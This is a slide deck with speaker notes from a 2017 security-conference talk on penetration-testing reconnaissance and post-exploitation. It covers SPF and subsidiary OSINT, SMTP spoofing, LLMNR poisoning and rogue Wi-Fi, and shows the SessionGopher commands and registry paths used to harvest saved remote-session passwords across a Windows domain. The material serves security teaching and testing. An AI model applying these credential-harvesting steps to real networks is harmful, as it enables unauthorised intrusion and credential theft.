PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 

Breadcrumbs to Loaves: BSides Austin '17

  • 1. Copyright © FireEye, Inc. All rights reserved.1 Brandon Arvanaghi @arvanaghi Breadcrumbs to LoavesHow Tidbits of Information Lead Us to Full-Scale Compromise
  • 2. Copyright © FireEye, Inc. All rights reserved.2 Brandon Arvanaghi (@arvanaghi) • Security Consultant at Mandiant • Webshell detection, post-exploitation, sandbox detection tools • Researched automated attack plan generation at Vanderbilt University
  • 3. Copyright © FireEye, Inc. All rights reserved.3 Breadcrumbs • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation • Types of breadcrumbs: • Open Source Intelligence Gathering (OSINT)/External • Wireless • Internal (physical connection connection) • Post-exploitation – Bulk of Talk • SessionGopher – tool I developed to discover Unix systems and jump boxes https://github.com/fireeye/SessionGopher
  • 4. Copyright © FireEye, Inc. All rights reserved.4 OSINT/EXTERNAL BREADCRUMBS
  • 5. Copyright © FireEye, Inc. All rights reserved.5 Crumb #1: SPF Records • Sender Policy Framework • You own example.com • Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers • Solution: SPF record at example.com’s DNS zone. Says “you should only see emails from @example.com from the following IP addresses: ….” • Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
  • 6. Copyright © FireEye, Inc. All rights reserved.6 Crumb #1: SPF Records • As an attacker, SPF records provide insight into third parties • Sometimes, companies want third parties to be able to send mail on their behalf • E.g. example of LinkedIn trusting DocuSign to send emails from https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf- records • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
  • 7. Copyright © FireEye, Inc. All rights reserved.7 Crumb #2: Subsidiaries • Company only as strong as its weakest link • Mergers and Acquisitions • Due diligence • Cyber insurance
  • 8. Copyright © FireEye, Inc. All rights reserved.8
  • 9.
  • 10.
  • 11. Crumb #3: Unauthenticated SMTP Server • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees • Without authentication, you can spoof any internal email address! http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp- commands-via-gmail
  • 12. Copyright © FireEye, Inc. All rights reserved.12 INTERNAL BREADCRUMBS
  • 13. Copyright © FireEye, Inc. All rights reserved.13 Crumb #1: LLMNR • LLMNR = Link-Local Multicast Name Resolution • Hosts on the same link (subnet) can resolve DNS queries, as opposed to just relying on DNS server • Peer-to-peer, decentralized • Fast • Multicast • Implicitly trust everyone • Responder by SpiderLabs
  • 14. Unicast Example I’m a PC DNSStandard DNS query
  • 15. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 Great! I’m coming to: I’m a PC
  • 16. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 ✅I’m a PC
  • 17. Multicast Example LLMNR Hi everyone! Where’s confluence.corp.com? That’s me! 10.1.40.15, come over! 10.1.40.15 I’m a PC
  • 18. Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15 Great! I’m coming to:
  • 20. Copyright © FireEye, Inc. All rights reserved.20 Crumb #2: IT HelpDesk/Intranet • Company helpdesk sites often lack authentication • Real examples from engagements: • “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3” • Excel file storing Unix system passwords
  • 21. Copyright © FireEye, Inc. All rights reserved.21 Crumb #2: IT HelpDesk/Intranet 1. Nmap scan across subnets 2. Run EyeWitness by Christopher Truncer
  • 22. Copyright © FireEye, Inc. All rights reserved.22 Crumb #3: Anonymous Shares • Publically available shared folders that do not require any form of authentication • Often out of perceived necessity • Contractors, vendors • Result: plaintext password files
  • 23. Copyright © FireEye, Inc. All rights reserved.23 Crumb #4: When Hostnames Make Sense • Use PowerView or ADExplorer to get lists of hostnames • Nonintrusive way to understand the role of each system without doing Nmap scans • SQLWIN7.CORP.COM • MAIL01.CORP.COM • MEDIA-BKUP.CORP.COM
  • 24. Copyright © FireEye, Inc. All rights reserved.24 WIRELESS BREADCRUMBS
  • 25. Copyright © FireEye, Inc. All rights reserved.25 Crumb #1: Guest Network Host Visibility • Guest networks should be segregated. This is not always done properly. • Visible hosts with visible services can lead to lateral movement onto corporate network • Pivot!
  • 26. Copyright © FireEye, Inc. All rights reserved.26 Crumb #2: Remembered Networks • Your device probes for every single access point it remembers having associated • Yells out known SSID names indiscriminately • WiFi Pineapple responds any probe, automatically connecting you • Direct your traffic to internet while reading all unencrypted traffic • Quietly changing HTTPS requests to HTTP
  • 27. Copyright © FireEye, Inc. All rights reserved.27 Remembered Networks: Real Mandiant Engagement
  • 28. Copyright © FireEye, Inc. All rights reserved.28 Remembered Networks: Real Mandiant Engagement
  • 29. Copyright © FireEye, Inc. All rights reserved.29 Remembered Networks: Real Mandiant Engagement associated!
  • 30. Copyright © FireEye, Inc. All rights reserved.30 Remembered Networks: Real Mandiant Engagement associated! Visible to two different networks PsExec, WMIExec, etc.
  • 31. 31
  • 32. Copyright © FireEye, Inc. All rights reserved.32 POST-EXPLOITATION SessionGopher: Finding Unix Systems and Jump Boxes https://github.com/fireeye/SessionGopher
  • 33. Copyright © FireEye, Inc. All rights reserved.33 The Registry • On many engagements, consultants are tasked with exploiting Unix systems • Intellectual property on Macbook Pros • Point of sale terminals running Linux • Etc. • Often not domain-joined! • Would be so much easier if they were • Use PowerView • How can we find & exploit them?
  • 34. Copyright © FireEye, Inc. All rights reserved.34 The Registry • Current methodology 1. Nmap for live hosts not found in Active Directory a. Open Unix ports 2. netstat domain-joined systems, look for active connections over Unix ports 3. Search Active Directory for groups like “Linux Admins” & “Mac Admins” a. Find their members’ workstations, active sessions • Methodology relies on luck and active sessions. Better way?
  • 35. Copyright © FireEye, Inc. All rights reserved.35 The Registry • HKEY_USERS • Persistent storage of saved session for any user who has logged in! • Users don’t have to be currently logged in • Though Unix systems not domain-joined, they are often managed by domain-joined Windows systems • Valuable artifacts on these hosts • Solves our “active session” problem • But what can we find in this magical hive that helps us exploit Unix systems?
  • 36. Copyright © FireEye, Inc. All rights reserved.36 The Registry
  • 37. Copyright © FireEye, Inc. All rights reserved.37 Solution 1. Find artifacts left by tools typically used to access Unix systems. 2. If they exist, then saved sessions might exist. Extract ’em.
  • 38. Copyright © FireEye, Inc. All rights reserved.38 Tools • WinSCP • FileZilla • PuTTY • SuperPuTTY • VNC • RDP • More!
  • 39. Copyright © FireEye, Inc. All rights reserved.39 Paths to Sessions Stored in Registry • PuTTY • HKEY_USERS<SID>SOFTWARESimonTathamPuTTYSessions • WinSCP • HKEY_USERS<SID>SOFTWAREMartin PrikrylWinSCP 2Sessions • Microsoft Remote Desktop • HKEY_USERS<SID> SOFTWAREMicrosoftTerminal Server ClientServers Non-registry (assumes filename/location unchanged) • FileZilla • <Drive>:Users<Username>AppDataRoamingFileZillasitemanager.xml • SuperPuTTY • <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
  • 40. Copyright © FireEye, Inc. All rights reserved.40 WinSCP HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2Sessions<SessionName> HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
  • 41. Copyright © FireEye, Inc. All rights reserved.41
  • 42. Copyright © FireEye, Inc. All rights reserved.42 WinSCP
  • 43. Copyright © FireEye, Inc. All rights reserved.43 Paths to Sessions • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
  • 44. Copyright © FireEye, Inc. All rights reserved.44 FileZilla <Drive>:Users<Username>AppDataRoamingFileZillaSiteManager.xml
  • 45. Copyright © FireEye, Inc. All rights reserved.45 SuperPuTTY <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml • ExtraArgs field can contain plaintext password
  • 46. Copyright © FireEye, Inc. All rights reserved.46 PuTTY .ppk Files • One-click PuTTY logins • Key can be plaintext (as in here) or encrypted
  • 47. Copyright © FireEye, Inc. All rights reserved.47 Microsoft .rdp Files • Executable, can be read by dragging into text editor • Plethora of arguments, many optional • Host, if admin, prompt for credentials, etc. • Fieldname:TypeOfField:Value • TypeOfField = Integer or String
  • 48. Copyright © FireEye, Inc. All rights reserved.48
  • 49. Copyright © FireEye, Inc. All rights reserved.49
  • 50. Copyright © FireEye, Inc. All rights reserved.50 Windows Management Instrumentation (WMI) • Rather than running SessionGopher on each computer (impractical), we can use WMI • Built-in “Invoke-WmiMethod” command in PowerShell • Remote registry querying ability
  • 51. Copyright © FireEye, Inc. All rights reserved.51
  • 52. Copyright © FireEye, Inc. All rights reserved.52 Write to CSV (Invoke-SessionGopher –o) • Create a physical mapping of the network • Aggregate all session data across entire domain or targeted computers • Essentially, see the physical infrastructure of network!
  • 53. Copyright © FireEye, Inc. All rights reserved.53 QUESTIONS? Twitter: @arvanaghi Github: https://github.com/fireeye/SessionGopher Brandon Arvanaghi

Editor's Notes

  1. SessionGopher: https://github.com/fireeye/SessionGopher
  2. https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records The receiving mail server automatically checks the SPF record for the domain, if they exist.
  3. Social engineering opportunities arise from seeing third-party relationships all from a DNS record!
  4. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  5. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  6. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries. Primary target for attacking a large organization: small, lesser-known subsidiaries.
  7. Command-line syntax: HELO <domain>  prepares the SMTP server for use MAIL FROM <email address>  Mail sender RCPT TO <email address>  Mail recipient DATA  Message headers from, to, subject, and content. Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
  8. Source: http://www.myintranetdashboard.com/graphics/screen2b.gif
  9. EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness EyeWitness automatically screenshots all HTTP/HTTPs ports discovered from Nmap for you, and makes an attempt at classifying the kind of site it is. When EyeWitness recognizes a credentialed page, it will provide you default credentials typically used for that service. Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
  10. Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
  11. On one of our engagements, we saw the physically-connected computers were still probing for remembered SSIDs because they had their WiFi turned on. Most people do not turn off their WiFi even when they are wired in, which can make them visible to the outside world!
  12. We spoofed the “gogoinflight” SSID and established an association between our TP-Link access point and the system. Now, we could see the system on our own spoofed subnet, see what services it was running, and tools against it.
  13. By running Responder or a social engineering campaign, we could use PsExec or WMIExec to exploit that system from our new subnet. Once we’ve gained access to that system, we could pivot to the wired internal network, since it is dual-homed! Essentially, we get access to the same wired-in benefits as any system physically connected. Despite this company not having any remote portal access or VPN, this physical security measure failed due to keeping WiFi enabled.
  14. System Preferences  Network  Advanced Used to be such that a more “preferred” association would make you drop your current association! E.g. if you are connected to CompanyWiFi, but had gogoinflight as a more preferred network and a gogoinflight SSID appeared, your system would automatically switch!
  15. https://github.com/fireeye/SessionGopher
  16. SID structure: S-1-5-21-Domain-User Query all these for domain users who have logged on! The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system. HKEY_USERS has persistent information about domain users who have logged onto a system. HKEY_CURRENT_USER is actually a symlink to the HKEY_USERS subkey of the currently logged in user!
  17. Persistent artifacts from all these tools can help get a network mapping not just for Unix systems, but also jump boxes. Jump boxes can be difficult to find, but when extracting all saved RDP sessions from each host, you can see to where these servers RDP. Once you find a saved RDP session with a hostname you know to be a segmented environment, you know which server can communicate with that host!
  18. The saved password string above for WinSCP sessions is not encrypted by default. That is obfuscation, and it is easily reversible. The “key” is the session hostname + username. The password will only be encrypted when the “UseMastrPassword” value in the second registry subkey is set to 1. If this is set, then you can only extract the encrypted password, and attempt to bruteforce it.
  19. As seen here, WinSCP’s password obfuscation algorithm uses a sequence of bitwise operation that is xor’d with a magic value. The password obfuscation algorithm has been reverse engineered across several languages, but never before in PowerShell.
  20. SessionGopher’s built-in WinSCP deobfuscator
  21. HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
  22. FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
  23. SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY does not store passwords, so many clients use SuperPuTTY as a wrapper. SuperPuTTY sessions are saved in a Sessions.xml file, and not in the registry. The password gets placed in the “ExtraArgs” argument, which can contain a multitude of additiona arguments. SuperPuTTY interprets anything following ”-pw” as the password argument for the SSH session.
  24. Stored sessions as .rdp files can be used for one-click logins. These files are executable and can also be dragged into a text editor like Sublime Text and read.
  25. SessionGopher synthesizes the .ppk and .rdp files and makes sense of them. It return the private key, private MAC, and whether or not the key is encrypted.
  26. . .\SessionGopher.ps1 Invoke-SessionGopher -Thorough
  27. Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system using the –Class ‘StdRegProv’. From your own attack computer connected to the network, you can read the persistent registry artifacts of HKEY_USERS for each box using WMI. Quiet, quick, and effective!
  28. Invoke-SessionGopher –iL inputlist.txt Invoke-SessionGopher –AllDomain Invoke-SessionGopher –Target winbox.company.com After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.